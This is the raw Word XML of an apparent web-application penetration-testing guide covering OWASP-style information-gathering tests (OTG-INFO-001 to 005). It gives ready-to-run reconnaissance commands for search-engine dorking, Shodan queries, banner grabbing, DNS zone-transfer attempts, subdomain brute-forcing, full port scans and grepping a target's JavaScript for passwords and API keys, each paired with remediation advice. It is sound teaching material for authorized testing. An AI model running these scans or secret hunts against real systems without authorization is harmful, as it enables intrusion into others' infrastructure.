        <w:t xml:space="preserve">Example Commands / Payloads — concrete, ready-to-adapt commands (replace target.com / IP addresses with the authorized scope).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation — the corresponding fix guidance to include in the report if the test confirms a finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Information gathering is the reconnaissance phase of a web application penetration test. The goal is to passively and actively collect as much data as possible about the target — infrastructure, technology stack, entry points, and any information inadvertently leaked publicly — before any active attack testing begins. Findings here shape the entire remainder of the engagement.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-INFO-001 – OTG-INFO-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-001  —  Conduct Search Engine Discovery and Reconnaissance for Information Leakage</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Google Hacking (dorks), Shodan, FOCA, Censys, PunkSpider, TheHarvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use search engines and OSINT platforms to discover information the organization has unintentionally exposed publicly — network diagrams, configuration files, credentials, error messages, employee data, or source code — that can aid an attacker.</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Build a list of Google dork queries targeting the domain: filetype, intitle, inurl and site operators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Shodan/Censys for the organization's IP ranges to identify exposed services and banners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use FOCA or exiftool to extract metadata (usernames, software versions, internal paths) from publicly indexed documents (PDF, DOCX, XLSX).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Search code repositories (GitHub, GitLab, Pastebin) for leaked credentials, API keys, or internal source code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Document every leaked artifact with source URL and date of discovery for the report.</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site:example.com filetype:pdf | filetype:xlsx | filetype:docx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">site:example.com intitle:"index of" OR inurl:admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">shodan search hostname:example.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">theHarvester -d example.com -b google,bing,shodan</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Remove sensitive documents from public web space; strip metadata before publishing files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure robots.txt/meta noindex for admin and staging areas, and enforce authentication on them regardless.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor public code repositories and paste sites for leaked organizational data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run periodic OSINT self-assessments as part of the security program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-002  —  Fingerprint Web Server</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httprint, httprecon, Nmap, Netcat, Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine the exact web server software and version to map it against known CVEs and select relevant exploits or checks.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Send a normal HTTP request and inspect the Server and X-Powered-By response headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Send malformed/edge-case HTTP requests (invalid methods, malformed headers) and compare error responses/banners against known server fingerprints, since headers are often altered or removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference the identified version against CVE databases (NVD, Exploit-DB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note HTTP header field ordering, which differs subtly by server implementation and can reveal the true server even when banners are hidden.</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curl -I https://target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -sV -p 443 --script=http-server-header target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nc target.com 80  (then send: HEAD / HTTP/1.0)</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Remove or obfuscate Server/X-Powered-By headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep the web server patched to the latest stable release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a WAF/reverse proxy in front of the origin server to normalize responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-003  —  Review Webserver Metafiles for Information Leakage</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Browser, curl, wget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze robots.txt, sitemap.xml, and HTML &lt;meta&gt; tags for disclosed paths, hidden directories, or sensitive references.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Request /robots.txt and /sitemap.xml directly and review every disallowed or listed path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">View page source and extract all &lt;meta&gt; tags for generator/CMS version, author, and comments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to browse to any interesting paths disclosed in robots.txt (these are hints, not access controls).</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curl https://target.com/robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl https://target.com/sitemap.xml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wget -q -O- https://target.com | grep -i '&lt;meta'</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Do not rely on robots.txt for access control — it merely asks compliant crawlers not to index a path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove sensitive paths from robots.txt and instead enforce authentication server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Strip unnecessary metadata (CMS version, author) from page headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-004  —  Enumerate Applications on Webserver</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dnsrecon, Nmap, fierce, Recon-ng, Intrigue, Sublist3r</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify all applications, virtual hosts, subdomains, and non-standard ports hosted on the target infrastructure to expand the attack surface map.</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Perform DNS zone transfer attempts and passive subdomain enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute-force subdomains against the target's apex domain using wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan the identified hosts across the full TCP port range for non-standard web ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Correlate discovered virtual hosts with certificate transparency logs (crt.sh).</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dnsrecon -d example.com -t axfr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fierce --domain example.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -p- -sV target-ip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">subfinder -d example.com | httpx</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Disable DNS zone transfers to untrusted hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decommission or properly secure forgotten/legacy subdomains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintain an accurate, current asset inventory for the domain and its subdomains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-005  —  Review Webpage Comments and Metadata for Information Leakage</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Browser, curl, wget, grep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Search HTML source, JavaScript files, and page metadata for developer comments, internal notes, or leftover debug information.</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Download full page source and all linked JS/CSS files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Grep for comment markers and common leak keywords (TODO, FIXME, password, key, debug, internal).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review JavaScript source maps if present, which often expose original, unminified source.</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curl -s https://target.com | grep -oP '&lt;!--.*?--&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wget -r -l1 -A.js https://target.com &amp;&amp; grep -riE 'todo|password|apikey|secret' *.js</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Strip comments during the build/minification process before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never commit secrets or internal notes into client-side code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
